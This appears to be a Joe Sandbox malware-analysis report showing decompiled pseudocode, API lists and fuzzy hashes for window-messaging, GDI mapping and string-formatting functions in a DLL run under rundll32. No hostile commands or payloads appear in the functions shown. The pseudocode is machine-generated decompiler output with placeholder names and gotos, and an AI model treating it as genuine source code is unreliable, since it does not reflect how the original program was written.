                                                                                                        • String ID:
                                                                                                        • API String ID: 235743446-0
                                                                                                        • Opcode ID: e52b8cadc8a241264832bf51a5e6ebb2303414c0d9b285d22f04d0475322bfc3
                                                                                                        • Instruction ID: c9a32e73d8042cfdadecad21669b4801cf05de11b689baf54d6faadfb4b2740c
                                                                                                        • Opcode Fuzzy Hash: e52b8cadc8a241264832bf51a5e6ebb2303414c0d9b285d22f04d0475322bfc3
                                                                                                        • Instruction Fuzzy Hash: 2C418E70640308BFEB15DB60CC56FEEBBA4FF08B54F004518FA956A1D1C7B5AA90CB54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1000E17B, Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 96%
                                                                                                        			E1000E17B(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t42;
				struct tagMSG* _t43;
				signed int _t45;
				void* _t48;
				void* _t50;
				int _t53;
				long _t56;
				signed int _t62;
				intOrPtr* _t64;
				intOrPtr* _t67;
				void* _t68;

				_t63 = __ecx;
				_t62 = 1;
				_t67 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E10011632(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t67 + 0x20));
				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
				_v4 = _t42;
				_t43 = E10028B7A(0);
				_t68 = UpdateWindow;
				_v8 = _t43;
				while(1) {
					L14:
					_t73 = _v12;
					if(_v12 == 0) {
						goto L15;
					}
					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
					if(__eflags != 0) {
						while(1) {
							L15:
							_t45 = E10028F57(_t63, 0, _t67, _t73);
							if(_t45 == 0) {
								break;
							}
							if(_t62 != 0) {
								_t53 = _v8->message;
								if(_t53 == 0x118 || _t53 == 0x104) {
									E10011739(_t67, 1);
									UpdateWindow( *(_t67 + 0x20));
									_t62 = 0;
								}
							}
							_t64 = _t67;
							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
							_t79 = _t48;
							if(_t48 == 0) {
								_t39 = _t67 + 0x3c;
								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
								__eflags =  *_t39;
								return  *((intOrPtr*)(_t67 + 0x44));
							} else {
								_t50 = E10028E71(_t62, _t64, 0, _t67, _t68, _t79, _v8);
								_pop(_t63);
								if(_t50 != 0) {
									_v12 = 1;
									_v16 = 0;
								}
								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L14;
								}
							}
						}
						_push(0);
						E10026933();
						return _t45 | 0xffffffff;
					}
					__eflags = _t62;
					if(_t62 != 0) {
						_t63 = _t67;
						E10011739(_t67, 1);
						UpdateWindow( *(_t67 + 0x20));
						_t62 = 0;
						__eflags = 0;
					}
					__eflags = _a4 & 0x00000001;
					if((_a4 & 0x00000001) == 0) {
						__eflags = _v4;
						if(_v4 != 0) {
							__eflags = _v16;
							if(_v16 == 0) {
								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
							}
						}
					}
					__eflags = _a4 & 0x00000002;
					if(__eflags != 0) {
						L13:
						_v12 = 0;
						continue;
					} else {
						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
						_v16 = _v16 + 1;
						__eflags = _t56;
						if(__eflags != 0) {
							continue;
						}
						goto L13;
					}
				}
				goto L15;
			}






















                                                                                                        0x1000e17b
                                                                                                        0x1000e184
                                                                                                        0x1000e18c
                                                                                                        0x1000e18e
                                                                                                        0x1000e192
                                                                                                        0x1000e196
                                                                                                        0x1000e1a4
                                                                                                        0x1000e1a4
                                                                                                        0x1000e1a9
                                                                                                        0x1000e1af
                                                                                                        0x1000e1b3
                                                                                                        0x1000e1b7
                                                                                                        0x1000e1bc
                                                                                                        0x1000e1c2
                                                                                                        0x1000e23a
                                                                                                        0x1000e23a
                                                                                                        0x1000e23a
                                                                                                        0x1000e23e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000e1d6
                                                                                                        0x1000e1d8
                                                                                                        0x1000e240
                                                                                                        0x1000e240
                                                                                                        0x1000e240
                                                                                                        0x1000e247
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000e24b
                                                                                                        0x1000e251
                                                                                                        0x1000e259
                                                                                                        0x1000e266
                                                                                                        0x1000e26e
                                                                                                        0x1000e270
                                                                                                        0x1000e270
                                                                                                        0x1000e259
                                                                                                        0x1000e274
                                                                                                        0x1000e276
                                                                                                        0x1000e27c
                                                                                                        0x1000e27e
                                                                                                        0x1000e2b9
                                                                                                        0x1000e2b9
                                                                                                        0x1000e2b9
                                                                                                        0x00000000
                                                                                                        0x1000e280
                                                                                                        0x1000e284
                                                                                                        0x1000e28b
                                                                                                        0x1000e28c
                                                                                                        0x1000e28e
                                                                                                        0x1000e296
                                                                                                        0x1000e296
                                                                                                        0x1000e2aa
                                                                                                        0x00000000
                                                                                                        0x1000e2ac
                                                                                                        0x00000000
                                                                                                        0x1000e2ac
                                                                                                        0x1000e2aa
                                                                                                        0x1000e27e
                                                                                                        0x1000e2ae
                                                                                                        0x1000e2af
                                                                                                        0x00000000
                                                                                                        0x1000e2b4
                                                                                                        0x1000e1da
                                                                                                        0x1000e1dc
                                                                                                        0x1000e1e0
                                                                                                        0x1000e1e2
                                                                                                        0x1000e1ea
                                                                                                        0x1000e1ec
                                                                                                        0x1000e1ec
                                                                                                        0x1000e1ec
                                                                                                        0x1000e1ee
                                                                                                        0x1000e1f3
                                                                                                        0x1000e1f5
                                                                                                        0x1000e1f9
                                                                                                        0x1000e1fb
                                                                                                        0x1000e1ff
                                                                                                        0x1000e20e
                                                                                                        0x1000e20e
                                                                                                        0x1000e1ff
                                                                                                        0x1000e1f9
                                                                                                        0x1000e214
                                                                                                        0x1000e219
                                                                                                        0x1000e236
                                                                                                        0x1000e236
                                                                                                        0x00000000
                                                                                                        0x1000e21b
                                                                                                        0x1000e228
                                                                                                        0x1000e22e
                                                                                                        0x1000e232
                                                                                                        0x1000e234
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000e234
                                                                                                        0x1000e219
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetParent.USER32(?), ref: 1000E1A9
                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000E1D0
                                                                                                        • UpdateWindow.USER32(?), ref: 1000E1EA
                                                                                                        • SendMessageA.USER32 ref: 1000E20E
                                                                                                        • SendMessageA.USER32 ref: 1000E228
                                                                                                        • UpdateWindow.USER32(?), ref: 1000E26E
                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000E2A2
                                                                                                          • Part of subcall function 10011632: GetWindowLongA.USER32 ref: 1001163D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                        • String ID:
                                                                                                        • API String ID: 2853195852-0
                                                                                                        • Opcode ID: 4739fee23b13e08182760d334db0f043c4c3d7fee15f3b90d057ef25ed01e1b6
                                                                                                        • Instruction ID: 72ff41fd9f7dd32265905932bc1d4f65a4bf79706bcd49659e4b5414e512fa02
                                                                                                        • Opcode Fuzzy Hash: 4739fee23b13e08182760d334db0f043c4c3d7fee15f3b90d057ef25ed01e1b6
                                                                                                        • Instruction Fuzzy Hash: B5418971208781ABE721DF258C84A1BBAF8FFC5BD4F00092CF995A11A5D772DE45CB52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1000E713, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1000E713(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t43;
				struct HWND__* _t48;
				long _t61;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E10028B71();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E1000AB4C(1, _t64, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E1003E9B0(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x28;
							_v48 = 1;
							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
						}
					}
				}
				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
				E1000E541(_t61, _t72, GetWindowLongA, _t85);
				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E1000E65F(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}



















                                                                                                        0x1000e71c
                                                                                                        0x1000e723
                                                                                                        0x1000e729
                                                                                                        0x1000e72e
                                                                                                        0x1000e753
                                                                                                        0x1000e753
                                                                                                        0x1000e759
                                                                                                        0x1000e75b
                                                                                                        0x1000e75b
                                                                                                        0x1000e759
                                                                                                        0x1000e75e
                                                                                                        0x1000e763
                                                                                                        0x1000e767
                                                                                                        0x1000e76a
                                                                                                        0x1000e76a
                                                                                                        0x1000e76d
                                                                                                        0x1000e775
                                                                                                        0x1000e77a
                                                                                                        0x1000e77a
                                                                                                        0x1000e77d
                                                                                                        0x1000e781
                                                                                                        0x1000e784
                                                                                                        0x1000e78b
                                                                                                        0x1000e790
                                                                                                        0x1000e792
                                                                                                        0x1000e796
                                                                                                        0x1000e7a0
                                                                                                        0x1000e7a5
                                                                                                        0x1000e7ab
                                                                                                        0x1000e7ae
                                                                                                        0x1000e7bf
                                                                                                        0x1000e7c6
                                                                                                        0x1000e7c9
                                                                                                        0x1000e7c9
                                                                                                        0x1000e796
                                                                                                        0x1000e790
                                                                                                        0x1000e7df
                                                                                                        0x1000e7e1
                                                                                                        0x1000e7f0
                                                                                                        0x1000e7fc
                                                                                                        0x1000e800
                                                                                                        0x1000e808
                                                                                                        0x1000e808
                                                                                                        0x1000e800
                                                                                                        0x1000e810
                                                                                                        0x1000e823

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: LongWindow$MessageSend_memset
                                                                                                        • String ID: (
                                                                                                        • API String ID: 2997958587-3887548279
                                                                                                        • Opcode ID: 9475107f4bcd42cfaf51e476ad957aef4f6cb65e63fd460d1fbacd75bfc4b36d
                                                                                                        • Instruction ID: a13358df60b230541d080f4df6e16caa9ee5b30fd314e6c263d4c0936c92a8c1
                                                                                                        • Opcode Fuzzy Hash: 9475107f4bcd42cfaf51e476ad957aef4f6cb65e63fd460d1fbacd75bfc4b36d
                                                                                                        • Instruction Fuzzy Hash: 3231E235600B919FEB10EF74C884A5AB7F9FF48390F11062CE589A7696DB70EC00CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100341AE, Relevance: 10.6, APIs: 7, Instructions: 93COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E100341AE(void* __ebx, int __ecx, void* __edi, void* __ebp, intOrPtr _a4) {
				struct HDC__* _t26;
				struct tagSIZE* _t39;
				int _t43;
				int _t44;
				long _t45;
				long _t46;
				struct tagSIZE* _t48;
				int _t51;

				_t41 = __ecx;
				_t51 = __ecx;
				if(_a4 != 0) {
					_t39 = __ecx + 0x38;
					GetViewportExtEx( *(__ecx + 8), _t39);
					_t48 = __ecx + 0x30;
					GetWindowExtEx( *(__ecx + 8), _t48);
					if(_t48->cx > 0xffffc000) {
						while(1) {
							_t45 = _t48->cx;
							if(_t45 >= 0x4000) {
								goto L6;
							}
							_t41 = _t39->cx;
							if(_t41 > 0xffffc000 && _t41 < 0x4000) {
								_t46 = _t45 + _t45;
								_t41 = _t41 + _t41;
								_t48->cx = _t46;
								_t39->cx = _t41;
								if(_t46 > 0xffffc000) {
									continue;
								}
							}
							goto L6;
						}
					}
					L6:
					if( *(_t51 + 0x34) > 0xffffc000) {
						while(1) {
							_t43 =  *(_t51 + 0x34);
							if(_t43 >= 0x4000) {
								goto L11;
							}
							_t41 =  *(_t51 + 0x3c);
							if(_t41 > 0xffffc000 && _t41 < 0x4000) {
								_t44 = _t43 + _t43;
								_t41 = _t41 + _t41;
								 *(_t51 + 0x34) = _t44;
								 *(_t51 + 0x3c) = _t41;
								if(_t44 > 0xffffc000) {
									continue;
								}
							}
							goto L11;
						}
					}
					L11:
					_t39->cx = E1003347E(_t41, _t39->cx,  *((intOrPtr*)(_t51 + 0x10)),  *0x10099128,  *((intOrPtr*)(_t51 + 0x14)), GetDeviceCaps( *(_t51 + 8), 0x58));
					 *(_t51 + 0x3c) = E1003347E(_t41,  *(_t51 + 0x3c),  *((intOrPtr*)(_t51 + 0x10)),  *0x1009912c,  *((intOrPtr*)(_t51 + 0x14)), GetDeviceCaps( *(_t51 + 8), 0x5a));
				}
				_t26 =  *(_t51 + 4);
				if(_t26 != 0) {
					SetMapMode(_t26, 8);
					SetWindowExtEx( *(_t51 + 4),  *(_t51 + 0x30),  *(_t51 + 0x34), 0);
					SetViewportExtEx( *(_t51 + 4),  *(_t51 + 0x38),  *(_t51 + 0x3c), 0);
					return E100340E0(_t51);
				}
				return _t26;
			}











                                                                                                        0x100341ae
                                                                                                        0x100341b4
                                                                                                        0x100341b6
                                                                                                        0x100341bf
                                                                                                        0x100341c6
                                                                                                        0x100341cc
                                                                                                        0x100341d3
                                                                                                        0x100341e5
                                                                                                        0x100341e7
                                                                                                        0x100341e7
                                                                                                        0x100341eb
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100341ed
                                                                                                        0x100341f1
                                                                                                        0x100341f7
                                                                                                        0x100341f9
                                                                                                        0x100341fd
                                                                                                        0x100341ff
                                                                                                        0x10034201
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10034201
                                                                                                        0x00000000
                                                                                                        0x100341f1
                                                                                                        0x100341e7
                                                                                                        0x10034203
                                                                                                        0x10034206
                                                                                                        0x10034208
                                                                                                        0x10034208
                                                                                                        0x1003420d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1003420f
                                                                                                        0x10034214
                                                                                                        0x1003421a
                                                                                                        0x1003421c
                                                                                                        0x10034220
                                                                                                        0x10034223
                                                                                                        0x10034226
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10034226
                                                                                                        0x00000000
                                                                                                        0x10034214
                                                                                                        0x10034208
                                                                                                        0x10034228
                                                                                                        0x1003424e
                                                                                                        0x10034269
                                                                                                        0x1003426c
                                                                                                        0x1003426d
                                                                                                        0x10034272
                                                                                                        0x10034277
                                                                                                        0x10034288
                                                                                                        0x10034299
                                                                                                        0x00000000
                                                                                                        0x100342a1
                                                                                                        0x100342a7

                                                                                                        APIs
                                                                                                        • GetViewportExtEx.GDI32(?,?,00000000,?,00000000,?,10034327,00000000), ref: 100341C6
                                                                                                        • GetWindowExtEx.GDI32(?,?,?,00000000,?,10034327,00000000), ref: 100341D3
                                                                                                        • GetDeviceCaps.GDI32(?,00000058), ref: 10034233
                                                                                                        • GetDeviceCaps.GDI32(?,0000005A), ref: 10034250
                                                                                                        • SetMapMode.GDI32(00000000,00000008), ref: 10034277
                                                                                                        • SetWindowExtEx.GDI32(00000000,?,?,00000000), ref: 10034288
                                                                                                        • SetViewportExtEx.GDI32(00000000,?,?,00000000), ref: 10034299
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CapsDeviceViewportWindow$Mode
                                                                                                        • String ID:
                                                                                                        • API String ID: 396987064-0
                                                                                                        • Opcode ID: 162b858425d00a8f4635e68dbe39dea5e427105f8c8a27507398efcdd0ffd8c4
                                                                                                        • Instruction ID: 5a9716ab1a8b05541cf5ae5f55e2f2a19fc8ee1d72fd22d957fcaa0c432ef5a2
                                                                                                        • Opcode Fuzzy Hash: 162b858425d00a8f4635e68dbe39dea5e427105f8c8a27507398efcdd0ffd8c4
                                                                                                        • Instruction Fuzzy Hash: 4E319275600A019FDB629F50DE80A1B7BF6FF44702B92892DF582A9920CB71F8518F00
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1001CC22, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 58%
                                                                                                        			E1001CC22(void* __ebx, intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v28;
				char _v544;
				int _v548;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t20;
				intOrPtr* _t22;
				intOrPtr _t27;
				int _t37;
				void* _t42;
				intOrPtr* _t53;
				void* _t54;
				signed int _t56;

				_t42 = __ebx;
				_t20 =  *0x10072650; // 0xb5e27fef
				_v8 = _t20 ^ _t56;
				_t53 = __ecx;
				_t22 = E1001C31C(__ecx);
				_t52 =  *_t22;
				 *((intOrPtr*)( *_t22 + 0x160))(_a4);
				if(E10011632(__ecx) < 0) {
					_t49 = __ecx;
					_t24 =  *((intOrPtr*)( *__ecx + 0x13c))();
					if(_a4 != 0) {
						_push(_t54);
						_push(0xffffffff);
						if(_t24 != 0) {
							_t27 =  *((intOrPtr*)(_t24 + 0x20));
						} else {
							_t27 =  *((intOrPtr*)(__ecx + 0xc4));
						}
						_push(_t27);
						_push(0x204);
						_push( &_v544);
						E10001000(_t42, _t53, 0x204, E1003EF8E());
						_t31 =  *((intOrPtr*)(_t53 + 0x58));
						if( *((intOrPtr*)(_t53 + 0x58)) > 0) {
							E1003F3D3( &_v28, 0x11, ":%d", _t31);
							_v548 = lstrlenA( &_v28);
							_t37 = lstrlenA( &_v544);
							_t49 = _v548 + _t37;
							_t42 = _t42;
							if(_v548 + _t37 < 0x204) {
								E10001000(_t42, _t53, 0x204, E1003F48B(_t52,  &_v544, 0x204,  &_v28));
							}
						}
						_t24 = E100296F9(_t49, _t52,  *((intOrPtr*)(_t53 + 0x20)),  &_v544);
						_pop(_t54);
					}
				}
				return E10039F21(_t24, _t42, _v8 ^ _t56, _t52, _t53, _t54);
			}


















                                                                                                        0x1001cc22
                                                                                                        0x1001cc2b
                                                                                                        0x1001cc32
                                                                                                        0x1001cc36
                                                                                                        0x1001cc38
                                                                                                        0x1001cc40
                                                                                                        0x1001cc44
                                                                                                        0x1001cc54
                                                                                                        0x1001cc5c
                                                                                                        0x1001cc5e
                                                                                                        0x1001cc68
                                                                                                        0x1001cc70
                                                                                                        0x1001cc71
                                                                                                        0x1001cc78
                                                                                                        0x1001cc82
                                                                                                        0x1001cc7a
                                                                                                        0x1001cc7a
                                                                                                        0x1001cc7a
                                                                                                        0x1001cc85
                                                                                                        0x1001cc8c
                                                                                                        0x1001cc8d
                                                                                                        0x1001cc94
                                                                                                        0x1001cc99
                                                                                                        0x1001cca1
                                                                                                        0x1001ccb0
                                                                                                        0x1001cccb
                                                                                                        0x1001ccd1
                                                                                                        0x1001ccd9
                                                                                                        0x1001ccdd
                                                                                                        0x1001ccde
                                                                                                        0x1001ccf2
                                                                                                        0x1001ccf7
                                                                                                        0x1001ccde
                                                                                                        0x1001cd04
                                                                                                        0x1001cd09
                                                                                                        0x1001cd09
                                                                                                        0x1001cc68
                                                                                                        0x1001cd16

                                                                                                        APIs
                                                                                                          • Part of subcall function 1001C31C: GetParent.USER32(?), ref: 1001C326
                                                                                                          • Part of subcall function 1001C31C: GetParent.USER32(00000000), ref: 1001C329
                                                                                                          • Part of subcall function 10011632: GetWindowLongA.USER32 ref: 1001163D
                                                                                                        • _wctomb_s.LIBCMT ref: 1001CC8E
                                                                                                        • _swprintf.LIBCMT ref: 1001CCB0
                                                                                                        • lstrlenA.KERNEL32(?), ref: 1001CCC2
                                                                                                        • lstrlenA.KERNEL32(?), ref: 1001CCD1
                                                                                                        • _strcat_s.LIBCMT ref: 1001CCEC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Parentlstrlen$LongWindow_strcat_s_swprintf_wctomb_s
                                                                                                        • String ID: :%d
                                                                                                        • API String ID: 4077431619-1955712242
                                                                                                        • Opcode ID: bfed95da87a5c65492c26d815201b42fd6dd4c6c238b9ffd280c5e0f6853dc27
                                                                                                        • Instruction ID: 6bb0e2fa273b13609a4f76e1e176c9fae11efa7639f5b51c290d710055c75903
                                                                                                        • Opcode Fuzzy Hash: bfed95da87a5c65492c26d815201b42fd6dd4c6c238b9ffd280c5e0f6853dc27
                                                                                                        • Instruction Fuzzy Hash: 03214475A002186FDB05DBA4DC99EEFB7ADEF08344F100565F50A9B142DB74EE918B90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1001519D, Relevance: 10.6, APIs: 7, Instructions: 79windowthreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 95%
                                                                                                        			E1001519D(intOrPtr* __ecx, long _a4) {
				void* __ebx;
				void* __ebp;
				void* _t26;
				signed int _t27;
				long _t40;
				signed int _t43;
				intOrPtr* _t54;
				void* _t55;

				_t47 = __ecx;
				_t43 = _a4;
				_t54 = __ecx;
				if(_t43 != 0 && ( *(__ecx + 0x3c) & 0x00000004) != 0) {
					E10011775(__ecx, 0);
					return SetFocus(0);
				}
				_t26 = E1000E5E5(_t43, _t47, _t55, GetParent( *(_t54 + 0x20)));
				if(_t26 == 0) {
					L5:
					if(_t43 != 0) {
						_t27 =  *(_t54 + 0x3c);
						if(_t27 < 0) {
							 *(_t54 + 0x3c) = _t27 & 0xffffff7f;
							 *((intOrPtr*)( *_t54 + 0xfc))();
							_a4 =  *(_t54 + 0x20);
							if(GetActiveWindow() == _a4) {
								SendMessageA(_a4, 6, 1, 0);
							}
						}
						if(( *(_t54 + 0x3c) & 0x00000020) != 0) {
							SendMessageA( *(_t54 + 0x20), 0x86, 1, 0);
						}
					} else {
						if( *((intOrPtr*)(_t54 + 0xb8)) == 0) {
							 *(_t54 + 0x3c) =  *(_t54 + 0x3c) | 0x00000080;
							 *((intOrPtr*)( *_t54 + 0xf8))();
						}
					}
					asm("sbb ebx, ebx");
					return E100138E7(_t54, _t55, ( ~_t43 & 0xfffffff0) + 0x20);
				} else {
					_a4 = 0;
					GetWindowThreadProcessId( *(_t26 + 0x20),  &_a4);
					_t40 = GetCurrentProcessId();
					if(_t40 == _a4) {
						return _t40;
					}
					goto L5;
				}
			}











                                                                                                        0x1001519d
                                                                                                        0x100151a1
                                                                                                        0x100151aa
                                                                                                        0x100151ac
                                                                                                        0x100151b5
                                                                                                        0x00000000
                                                                                                        0x100151bb
                                                                                                        0x100151d0
                                                                                                        0x100151d7
                                                                                                        0x100151f9
                                                                                                        0x100151fb
                                                                                                        0x10015218
                                                                                                        0x10015223
                                                                                                        0x1001522a
                                                                                                        0x10015231
                                                                                                        0x1001523a
                                                                                                        0x10015246
                                                                                                        0x10015251
                                                                                                        0x10015251
                                                                                                        0x10015246
                                                                                                        0x10015257
                                                                                                        0x10015265
                                                                                                        0x10015265
                                                                                                        0x100151fd
                                                                                                        0x10015203
                                                                                                        0x10015207
                                                                                                        0x10015210
                                                                                                        0x10015210
                                                                                                        0x10015203
                                                                                                        0x10015269
                                                                                                        0x00000000
                                                                                                        0x100151d9
                                                                                                        0x100151e1
                                                                                                        0x100151e4
                                                                                                        0x100151ea
                                                                                                        0x100151f3
                                                                                                        0x1001527d
                                                                                                        0x1001527d
                                                                                                        0x00000000
                                                                                                        0x100151f3

                                                                                                        APIs
                                                                                                        • SetFocus.USER32(00000000,00000000), ref: 100151BB
                                                                                                        • GetParent.USER32(?), ref: 100151C9
                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 100151E4
                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 100151EA
                                                                                                        • GetActiveWindow.USER32 ref: 1001523D
                                                                                                        • SendMessageA.USER32 ref: 10015251
                                                                                                        • SendMessageA.USER32 ref: 10015265
                                                                                                          • Part of subcall function 10011775: EnableWindow.USER32(?,?), ref: 10011782
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
